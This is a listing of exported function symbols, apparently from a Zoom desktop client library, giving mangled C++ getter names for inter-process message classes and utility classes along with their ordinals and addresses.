              ?Get_componentType@CSBMBMessage_PSCancelDownloadComponent@@QAEAAIXZ34130x40c930
              ?Get_componentType@CSBMBMessage_PSComponentDownloadProgress@@QAEAAIXZ34140x40c930
              ?Get_componentType@CSBMBMessage_PSComponentDownloadResult@@QAEAAIXZ34150x40c930
              ?Get_componentType@CSBMBMessage_PSQueryComponentExist@@QAEAAIXZ34160x40c930
              ?Get_componentType@CSBMBMessage_PSQueryComponentExistResult@@QAEAAIXZ34170x40c930
              ?Get_componentType@CSBMBMessage_PSStartDownloadComponent@@QAEAAIXZ34180x40c930
              ?Get_componentType@CSBMBMessage_StartDownloadComponent@@QAEAAIXZ34190x40c930
              ?Get_component_data@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ34200x4190a0
              ?Get_component_data@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ34210x4190a0
              ?Get_composedEventInfo@CSBMBMessage_TrackingPAAPEvent@@QAEAAV?$CStringT@_W@Cmm@@XZ34220x40c930
              ?Get_configStr@CSBMBMessage_ZpnsUpdateHuddlesSettings@@QAEAAV?$CStringT@D@Cmm@@XZ34230x40c930
              ?Get_config_source@CSBMBMessage_InitUserPolicySettings@@QAEAAIXZ34240x417570
              ?Get_config_source@CSBMBMessage_PolicyUpdated@@QAEAAIXZ34250x417570
              ?Get_contactConfig@CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@QAEAAV?$CStringT@D@Cmm@@XZ34260x417f30
              ?Get_count@CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAEAA_KXZ34270x418730
              ?Get_count@CSBMBMessage_PairRelationTokenRequest@@QAEAAIXZ34280x417570
              ?Get_customizedMsg@CSBMBMessage_NotifyPTFeedbackInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ34290x418390
              ?Get_d_microphone@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEAAV?$CStringT@D@Cmm@@XZ34300x417f30
              ?Get_data@CSBMBMessage_Assisant_Keybase@@QAEAAV?$CStringT@D@Cmm@@XZ34310x40c930
              ?Get_data@CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@QAEAAV?$CStringT@D@Cmm@@XZ34320x40c930
              ?Get_data@CSBMBMessage_ECDNSetBackupSuperNodeInfo@@QAEAAV?$CStringT@D@Cmm@@XZ34330x40c930
              ?Get_data@CSBMBMessage_NotifyRunningLate@@QAEAAV?$CStringT@D@Cmm@@XZ34340x40c930
              ?Get_data@CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAEAAIXZ34350x418390
              ?Get_data_type@CSBMBMessage_MeetingCacheBytesKVOperate@@QAEAAHXZ34360x40c930
              ?Get_deeplinkUrl@CSBMBMessage_PMCMeetChatMsgDeepLinkReq@@QAEAAV?$CStringT@_W@Cmm@@XZ34370x40c930
              ?Get_defaultGiphyList@CSBMBMessage_PMCQueryDefaultGiphyReq@@QAEAAV?$CStringT@_W@Cmm@@XZ34380x417570
              ?Get_defaultGiphySerializeData@CSBMBMessage_PMCQueryDefaultGiphyRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ34390x40c930
              ?Get_dest_process@CSBMBMessage_SettingUpdated@@QAEAAIXZ34400x419ac0
              ?Get_detail@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEAAV?$CStringT@D@Cmm@@XZ34410x418390
              ?Get_senderName@CSBMBMessage_NotifyMeetingCallResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ37840x418390
              ?Get_serviceName@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAEAAV?$CStringT@D@Cmm@@XZ37850x40c930
              ?Get_serviceName@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAEAAV?$CStringT@D@Cmm@@XZ37860x417c00
              ?Get_sessionID@CSBMBMessage_NotifyMeetingCallResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ37870x418ba0
              ?Get_sessionId@CSBMBMessage_CheckInSessionReq@@QAEAAV?$CStringT@_W@Cmm@@XZ37880x417570
              ?Get_sessionId@CSBMBMessage_CheckInSessionRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ37890x417c00
              ?Get_sessionId@CSBMBMessage_PMCMeetChatMsgReaded@@QAEAAV?$CStringT@_W@Cmm@@XZ37900x40c930
              ?Get_sessionId@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAV?$CStringT@_W@Cmm@@XZ37910x418390
              ?Get_sessionId@CSBMBMessage_PMCOpenTeamChatRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ37920x417c00
              ?Get_sessionId@CSBMBMessage_ShareMeetingChatRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ37930x4190a0
              ?Get_sessionName@CSBMBMessage_ShareMeetingChatRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ37940x419af0
              ?Get_sessionOption@CSBMBMessage_ShareMeetingChatRsp@@QAEAAV?$CStringT@_W@Cmm@@XZ37950x41af70
              ?Get_sessionType@CSBMBMessage_ShareMeetingChatRsp@@QAEAAHXZ37960x417c00
              ?Get_sha256sum@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ37970x417f50
              ?Get_sha256sum@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ37980x417f50
              ?Get_shareAction@CSBMBMessage_ShareMeetingChatRsp@@QAEAAHXZ37990x40c930
              ?Get_shareFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ38000x418ba0
              ?Get_shareResult@CSBMBMessage_ShareMeetingChatRsp@@QAEAAHXZ38010x4212f0
              ?Get_sharing_role@CSBMBMessage_NotifyStartDocsShare@@QAEAAV?$CStringT@_W@Cmm@@XZ38020x417570
              ?Get_sharing_role@CSBMBMessage_NotifyStartWhiteboardShare@@QAEAAIXZ38030x417570
              ?Get_showAvatar@CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAEAAHXZ38040x40c930
              ?Get_showState@CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAEAAHXZ38050x417570
              ?Get_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAIXZ38060x417c00
              ?Get_signalType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAIXZ38070x418730
              ?Get_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEAAIXZ38080x417c00
              ?Get_signalType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEAAIXZ38090x418730
              ?Get_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAEAAIXZ38100x41a740
              ?Get_signalType@CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAEAAIXZ38110x41a740
              ?Get_smallUrl@CSBMBMessage_NotifyUserPropertiesChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ38120x40c930
              ?Get_smapleRate@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEAAIXZ38130x418bd0
              ?Get_source@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38140x418bd0
              ?Get_source@CSBMBMessage_InviteeIakRequest@@QAEAAHXZ38150x417570
              ?Get_source@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEAAHXZ38160x418390
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAIXZ38170x4190a0
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAIXZ38180x418600
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEAAIXZ38190x418730
              ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEAAIXZ38200x4190a0
              ?Get_speakerID@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38210x417570
              ?Get_star@CSBMBMessage_VCardSetBuddyStar@@QAEAAHXZ38220x417570
              ?Get_start@CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAEAAHXZ38230x40c930
              ?Get_status@CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAEAAIXZ38240x40c930
              ?Get_status@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEAAHXZ38250x417c00
              ?Get_status@CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38260x40c930
              ?Get_status@CSBMBMessage_NotifyConferenceStatus@@QAEAAIXZ38270x418760
              ?Get_status@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAHXZ38280x418390
              ?Get_status@CSBMBMessage_NotifyPTDeviceInfo@@QAEAAIXZ38290x417c00
              ?Get_status@CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAEAAHXZ38300x40c930
              ?Get_str@CSBMBMessage_MeetingDiagInfo@@QAEAAV?$CStringT@D@Cmm@@XZ38310x40c930
              ?Get_strCallId@CSBMBMessage_StartCallOutInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ38320x419b50
              ?Get_strCommand@CSBMBMessage_CCIVideoReceiveCommandNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38330x40c930
              ?Get_strCommand@CSBMBMessage_CCIVideoSendCommandRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38340x417570
              ?Get_strCustomerId@CSBMBMessage_CCIVideoChangeHostRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38350x40c930
              ?Get_strCustomerId@CSBMBMessage_CCIVideoSendCommandRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38360x40c930
              ?Get_strData@CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAEAAV?$CStringT@D@Cmm@@XZ38370x40c930
              ?Get_strDefaultProfile@CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38380x40c930
              ?Get_strEngagementId@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38390x418bd0
              ?Get_strJsCallId@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38400x417c00
              ?Get_strJsCallId@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38410x418390
              ?Get_strJson@CSBMBMessage_CCIVideoJoinMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38420x40c930
              ?Get_strJsonEvents@CSBMBMessage_OutlookGetMAPICalendarEvents@@QAEAAV?$CStringT@D@Cmm@@XZ38430x40c930
              ?Get_strMsg@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38440x40c930
              ?Get_strResult@CSBMBMessage_CCIVideoWarmTransferNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38450x40c930
              ?Get_strSessionId@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38460x418ba0
              ?Get_strSessionName@CSBMBMessage_CCIScreenRecordingNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38470x418390
              ?Get_strSpokenLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEAAV?$CStringT@_W@Cmm@@XZ38480x417c00
              ?Get_strStatus@CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ38490x40c930
              ?Get_strStatus@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38500x40c930
              ?Get_strToken@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38510x417c00
              ?Get_strTpc@CSBMBMessage_CCIScreenRecordingRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38520x418ba0
              ?Get_strTranscriptLangName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAEAAV?$CStringT@_W@Cmm@@XZ38530x419ac0
              ?Get_strType@CSBMBMessage_Notify_ZPNS_MeetingStart@@QAEAAV?$CStringT@_W@Cmm@@XZ38540x40c930
              ?Get_strUserId@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38550x417570
              ?Get_strUserId@CSBMBMessage_CCIVideoWarmTransferRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ38560x417570
              ?Get_strUserName@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAV?$CStringT@_W@Cmm@@XZ38570x417f30
              ?Get_subConfType@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ38580x419c90
              ?Get_subHasError@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ38590x419c60
              ?Get_subSdkError@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ38600x419cc0
              ?Get_success@CSBMBMessage_CameraControlGroupFetched@@QAEAAHXZ38610x417570
              ?Get_success@CSBMBMessage_CameraControlGroupRemoved@@QAEAAHXZ38620x417570
              ?Get_success@CSBMBMessage_ComponentDownloadResult@@QAEAAHXZ38630x417c00
              ?Get_success@CSBMBMessage_PSComponentDownloadResult@@QAEAAHXZ38640x417c00
              ?Get_text@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAV?$CStringT@_W@Cmm@@XZ38650x418ba0
              ?Get_text@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38660x40c930
              ?Get_threadId@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAV?$CStringT@_W@Cmm@@XZ38670x418bd0
              ?Get_threadSvrTime@CSBMBMessage_PMCOpenTeamChatReq@@QAEAA_JXZ38680x422ea0
              ?Get_thumbnailUrl@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEAAV?$CStringT@_W@Cmm@@XZ38690x417f50
              ?Get_thumbnail_path@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ38700x419af0
              ?Get_thumbnail_path@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEAAV?$CStringT@_W@Cmm@@XZ38710x419af0
              ?Get_timeStamp@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAA_JXZ38720x41c710
              ?Get_timeout_seconds@CSBMBMessage_MediaAPIRequest@@QAEAAIXZ38730x418390
              ?Get_title@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEAAV?$CStringT@D@Cmm@@XZ38740x417c00
              ?Get_title@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ38750x417570
              ?Get_title@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ38760x417570
              ?Get_tmServerside@CSBMBMessage_NotifyMeetingCallResponse@@QAEAA_JXZ38770x41c710
              ?Get_to_WindowId@CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38780x417570
              ?Get_to_WindowId@CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38790x417570
              ?Get_toggle@CSBMBMessage_MeetingPAAPToggleEvent@@QAEAAHXZ38800x417570
              ?Get_token@CSBMBMessage_CompanionTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38810x417f50
              ?Get_token@CSBMBMessage_InviteZoomPhoneTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38820x417570
              ?Get_token@CSBMBMessage_PairRelationTokenResponse@@QAEAAV?$CStringT@D@Cmm@@XZ38830x418390
              ?Get_top@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAHXZ38840x426270
              ?Get_trackingId@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEAAV?$CStringT@D@Cmm@@XZ38850x4193d0
              ?Get_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAEAAHXZ38860x418bd0
              ?Get_txChannelCounts@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEAAHXZ38870x41f260
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAHXZ38880x418730
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ38890x4190a0
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAEAAHXZ38900x40c930
              ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAEAAHXZ38910x417c00
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAEAAHXZ38920x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAEAAHXZ38930x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAEAAHXZ38940x40c930
              ?Get_type@CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAEAAHXZ38950x40c930
              ?Get_type@CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAEAAIXZ38960x422ea0
              ?Get_type@CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAEAAV?$CStringT@D@Cmm@@XZ38970x417570
              ?Get_type@CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAEAAHXZ38980x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAEAAHXZ38990x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAEAAHXZ39000x40c930
              ?Get_type@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAHXZ39010x417570
              ?Get_type@CSBMBMessage_NotifyPTDeviceInfo@@QAEAAIXZ39020x40c930
              ?Get_type@CSBMBMessage_NotifyShareFileInMeetingChat@@QAEAAV?$CStringT@_W@Cmm@@XZ39030x418190
              ?Get_type@CSBMBMessage_PS_UpdateAccountInfo@@QAEAAHXZ39040x40c930
              ?Get_type@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEAAHXZ39050x40c930
              ?Get_type@CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAEAAHXZ39060x40c930
              ?Get_type@CSBMBMessage_SaveCustom3DAvatarToWeb@@QAEAAHXZ39070x40c930
              ?Get_type@CSBMBMessage_TrackingPAAPEvent@@QAEAAHXZ39080x417570
              ?Get_type@CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAEAAHXZ39090x40c930
              ?Get_url@CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAEAAV?$CStringT@D@Cmm@@XZ39100x40c930
              ?Get_url@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39110x417f30
              ?Get_url@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39120x417f30
              ?Get_url@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEAAV?$CStringT@_W@Cmm@@XZ39130x40c930
              ?Get_url@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39140x417f30
              ?Get_url@CSBMBMessage_ZoomInternalNavigateURLEvent@@QAEAAV?$CStringT@_W@Cmm@@XZ39150x40c930
              ?Get_userData@CSBMBMessage_NotifyMeetingImageDownloaded@@QAEAAHXZ39160x417f30
              ?Get_userDeviceID@CSBMBMessage_NotifyConfPListChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ39170x418ba0
              ?Get_userEmail@CSBMBMessage_NotifyPTCleanIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39180x417570
              ?Get_userEmail@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39190x418190
              ?Get_userFBID@CSBMBMessage_NotifyConfPListChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ39200x418390
              ?Get_userFMName@CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ39210x418390
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAEAAHXZ39220x40c930
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ39230x417c00
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEAAHXZ39240x40c930
              ?Get_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAEAAHXZ39250x417c00
              ?Get_userID@CSBMBMessage_NotifyPTCleanIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39260x40c930
              ?Get_userID@CSBMBMessage_RequestMyIDPToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39270x418160
              ?Get_userId@CSBMBMessage_CCIVideoAssignAndNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ39280x40c930
              ?Get_userName@CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39290x418760
              ?Get_userZoomID@CSBMBMessage_UserInTrustListInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39300x40c930
              ?Get_user_guid@CSBMBMessage_ConfGetZRMeetingInfoReq@@QAEAAV?$CStringT@_W@Cmm@@XZ39310x40c930
              ?Get_user_input@CSBMBMessage_ConfirmRecaptcha@@QAEAAV?$CStringT@_W@Cmm@@XZ39320x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardDataRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ39330x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardFetchManagerInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39340x40c930
              ?Get_user_zoom_id@CSBMBMessage_VCardSetBuddyStar@@QAEAAV?$CStringT@_W@Cmm@@XZ39350x40c930
              ?Get_value@CSBMBMessage_MeshNotification@@QAEAAV?$CStringT@D@Cmm@@XZ39360x417c00
              ?Get_value@CSBMBMessage_PS_UpdateKeyValueInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39370x418390
              ?Get_value@CSBMBMessage_RequestUpdateAICAdminSetting@@QAEAAHXZ39380x417570
              ?Get_videoEvent@CSBMBMessage_CCIVideoEventReportNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ39390x40c930
              ?Get_wParam@CSBMBMessage_InviteWinStatus@@QAEAAIXZ39400x418730
              ?Get_wallpaper_id@CSBMBMessage_MeetingWallpaperStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39410x40c930
              ?Get_wallpaper_id@CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAEAAV?$CStringT@_W@Cmm@@XZ39420x40c930
              ?Get_wallpaper_id@CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ39430x40c930
              ?Get_webClientUrl@CSBMBMessage_LeaveConfErrorDesc@@QAEAAV?$CStringT@_W@Cmm@@XZ39440x418bd0
              ?Get_web_record_info@CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAEAAV?$CStringT@_W@Cmm@@XZ39450x418390
              ?Get_web_record_info@CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAEAAV?$CStringT@_W@Cmm@@XZ39460x417c00
              ?Get_whiteboardUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39470x41a1a0
              ?Get_width@CSBMBMessage_PMCOpenTeamChatReq@@QAEAAHXZ39480x41a080
              ?Get_windowId@CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39490x418390
              ?Get_windowId@CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39500x418390
              ?Get_windowId@CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAEAAV?$CStringT@D@Cmm@@XZ39510x418390
              ?Get_workflowUrlRegualr@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39520x41a170
              ?Get_workvivoDomain@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ39530x41a0e0
              ?Get_zoomDocsUrlRegular@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ39540x41a140
              ?Get_zr_userid@CSBMBMessage_NotifyConfZRMeetingInfo@@QAEAAHXZ39550x417c00
              ?GetlocalTm2@CTime@Cmm@@QBE_NAAUtm@@@Z39560x411e10
              ?HasBOM@XMLDocument@tinyxml2@@QBE_NXZ39570x4544b0
              ?HasUrgentEvent@CCmmPerfTelemetry@@SAHXZ39580x4564e0
              ?HighResNow@TimeTicks@Cmm@@SA?AV12@XZ39590x451d20
              ?Identify@XMLDocument@tinyxml2@@QAEPADPADPAPAVXMLNode@2@@Z39600x460240
              ?InDays@TimeDelta@Cmm@@QBEHXZ39610x451200
              ?InHours@TimeDelta@Cmm@@QBEHXZ39620x451220
              ?InMicroseconds@TimeDelta@Cmm@@QBE_JXZ39630x411a70
              ?InMilliseconds@TimeDelta@Cmm@@QBE_JXZ39640x4512e0
              ?InMillisecondsF@TimeDelta@Cmm@@QBENXZ39650x4512b0
              ?InMillisecondsRoundedUp@TimeDelta@Cmm@@QBE_JXZ39660x451300
              ?InMinutes@TimeDelta@Cmm@@QBEHXZ39670x451240
              ?InSeconds@TimeDelta@Cmm@@QBE_JXZ39680x451290
              ?InSecondsF@TimeDelta@Cmm@@QBENXZ39690x451260
              ?Inc@CAtomicInt@Cmm@@QAEJXZ39700x417030
              ?Init@LogMessage@logging@@AAEXPBDH@Z39710x45e4c0
              ?Initialize@CPU@Cmm@@AAEXXZ39720x45f2d0
              ?InsertAfterChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@0@Z39730x460680
              ?InsertBeforeExtension@FilePath@Cmm@@QBE?AV12@ABV?$CStringT@_W@2@@Z39740x45b060
              ?InsertBeforeExtensionASCII@FilePath@Cmm@@QBE?AV12@ABVStringPiece@2@@Z39750x45b1c0
              ?InsertChildPreamble@XMLNode@tinyxml2@@ABEXPAV12@@Z39760x460a40
              ?InsertEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z39770x4605e0
              ?InsertFirstChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z39780x460630
              ?InsertNewChildElement@XMLElement@tinyxml2@@QAEPAV12@PBD@Z39790x461ea0
              ?InsertNewComment@XMLElement@tinyxml2@@QAEPAVXMLComment@2@PBD@Z39800x461ed0
              ?InsertNewDeclaration@XMLElement@tinyxml2@@QAEPAVXMLDeclaration@2@PBD@Z39810x461f30
              ?InsertNewText@XMLElement@tinyxml2@@QAEPAVXMLText@2@PBD@Z39820x461f00
              ?InsertNewUnknown@XMLElement@tinyxml2@@QAEPAVXMLUnknown@2@PBD@Z39830x461f60
              ?Int64Attribute@XMLElement@tinyxml2@@QBE_JPBD_J@Z39840x461510
              ?Int64Text@XMLElement@tinyxml2@@QBE_J_J@Z39850x461b70
              ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@D@1@@Z39860x414000
              ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@_W@1@@Z39870x414070
              ?Int64Value@XMLAttribute@tinyxml2@@QBE_JXZ39880x4545a0
              ?IntAttribute@XMLElement@tinyxml2@@QBEHPBDH@Z39890x4614b0
              ?IntText@XMLElement@tinyxml2@@QBEHH@Z39900x461b30
              ?IntToString@Cmm@@YAXHAAV?$CStringT@D@1@@Z39910x4143b0
              ?IntToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z39920x414400
              ?IntValue@XMLAttribute@tinyxml2@@QBEHXZ39930x454580
              ?IsAbsolute@FilePath@Cmm@@QBE_NXZ39940x45b600
              ?IsContainer@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ39950x454400
              ?IsEmpty@?$CStringT@D@Cmm@@QBEHXZ39960x403ae0
              ?IsEmpty@?$CStringT@_W@Cmm@@QBEHXZ39970x403ae0
              ?IsEnablePerformanceMetrics@CCmmPerfTelemetry@@SAHXZ39980x4564a0
              ?IsEnableSendMetrics@CCmmPerfTelemetry@@SAHXZ39990x4564b0
              ?IsEssential@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40000x458830
              ?IsGood@Channel@ssb_ipc@@QAE_NXZ40010x45cb30
              ?IsHighResClockWorking@TimeTicks@Cmm@@SA_NXZ40020x451db0
              ?IsNameChar@XMLUtil@tinyxml2@@SA_NE@Z40030x4542d0
              ?IsNameStartChar@XMLUtil@tinyxml2@@SA_NE@Z40040x4542a0
              ?IsOpened@CFile@Cmm@@QAEHXZ40050x411890
              ?IsParent@FilePath@Cmm@@QBE_NABV12@@Z40060x45ac80
              ?IsParsed@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ40070x417000
              ?IsRunning@CThread@Cmm@@QAEHXZ40080x417340
              ?IsSeparator@FilePath@Cmm@@SA_N_W@Z40090x45a8a0
              ?IsServerGood@CIPCChannelThread@ssb_ipc@@QAEHXZ40100x4281b0
              ?IsSignaled@CState@Cmm@@QAEHXZ40110x4171a0
